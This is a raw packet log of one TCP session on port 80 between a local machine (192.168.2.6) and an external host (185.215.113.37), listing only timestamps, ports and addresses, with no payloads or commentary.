Oct 24, 2024 13:02:20.463411093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.500459909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500493050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500504017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500510931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500519037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500526905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500535011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500543118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500663996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500683069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500693083 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.500737906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.500776052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500792027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500812054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.500838041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.500933886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500952005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500968933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500977993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.500986099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.500991106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501003027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501012087 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501020908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501023054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501041889 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501060009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501187086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501204967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501230001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501230955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501239061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501247883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501266003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501271963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501286030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501303911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501413107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501430035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501446009 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501451969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501461983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501471043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501478910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501486063 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501497984 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501499891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501518965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501534939 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501660109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501677036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501693964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501710892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501724005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501739025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501897097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501914024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501929045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501949072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501954079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501959085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501971006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501976967 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.501988888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.501993895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502005100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502015114 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502023935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502039909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502041101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502053976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502055883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502065897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502073050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502088070 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502095938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502115011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502305984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502322912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502338886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502355099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502360106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502372026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502382994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502398014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502468109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502480984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502522945 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502532959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502605915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502621889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502636909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502650023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502651930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502665043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502669096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502677917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502685070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502695084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502708912 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502731085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502748966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502764940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502782106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502789021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502798080 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.502804995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502820015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.502875090 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503220081 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503236055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503252029 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503267050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503273964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503282070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503284931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503298998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503309965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503334999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503350973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503366947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503384113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503395081 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503400087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503413916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503429890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503448963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503572941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503626108 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503648996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503665924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503698111 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503706932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503741980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503757000 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503772020 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503778934 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503788948 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.503799915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503808975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.503829002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504014969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504030943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504046917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504060984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504067898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504077911 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504077911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504093885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504095078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504105091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504111052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504122019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504129887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504143000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504148006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504153013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504173040 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504180908 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504333973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504384041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504518986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504534960 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504550934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504565954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504573107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504582882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504584074 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504600048 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504611015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504616022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504632950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504638910 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504648924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504661083 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504664898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504682064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504689932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504707098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504729033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504892111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504941940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.504951954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504971027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.504986048 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.505002022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.505016088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.505016088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.505017042 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.505028009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.505043030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.505057096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.505161047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.505208969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.530864000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.536871910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815068007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815093040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815110922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815128088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815179110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.815721035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815766096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.815866947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815885067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815903902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.815931082 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.815954924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815973043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815990925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.815999031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816008091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816018105 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816030025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816047907 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816108942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816123962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816148043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816148996 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816164970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816169977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816184044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816193104 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816200018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816201925 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816219091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816221952 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816236973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816241980 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816255093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816256046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816277981 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816292048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816622019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816641092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816656113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816667080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816667080 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816679955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816693068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816698074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816715002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816720963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816730976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816730976 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816747904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816755056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816764116 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816771030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816781044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816786051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816797972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816811085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816812038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816819906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816838026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816844940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816854954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816867113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816871881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.816875935 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816893101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.816905022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817302942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817320108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817337036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817341089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817353010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817353964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817370892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817375898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817387104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817394018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817404032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817411900 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817418098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817420006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817437887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817442894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817450047 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817454100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817470074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817476034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817487001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817492008 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817504883 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817528009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817859888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817877054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817892075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817897081 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817909002 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817910910 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817926884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817931890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817939997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817944050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817960978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817966938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817974091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.817977905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.817996025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818000078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818011999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818018913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818028927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818046093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818053961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818064928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818088055 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818101883 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818377018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818393946 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818408966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818418026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818425894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818434000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818443060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818444014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818461895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818464994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818479061 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818485022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818495989 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818500042 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818514109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818521976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818531990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.818540096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818546057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.818548918 CEST	80	49711	185.215.113.37	192.168.2.6
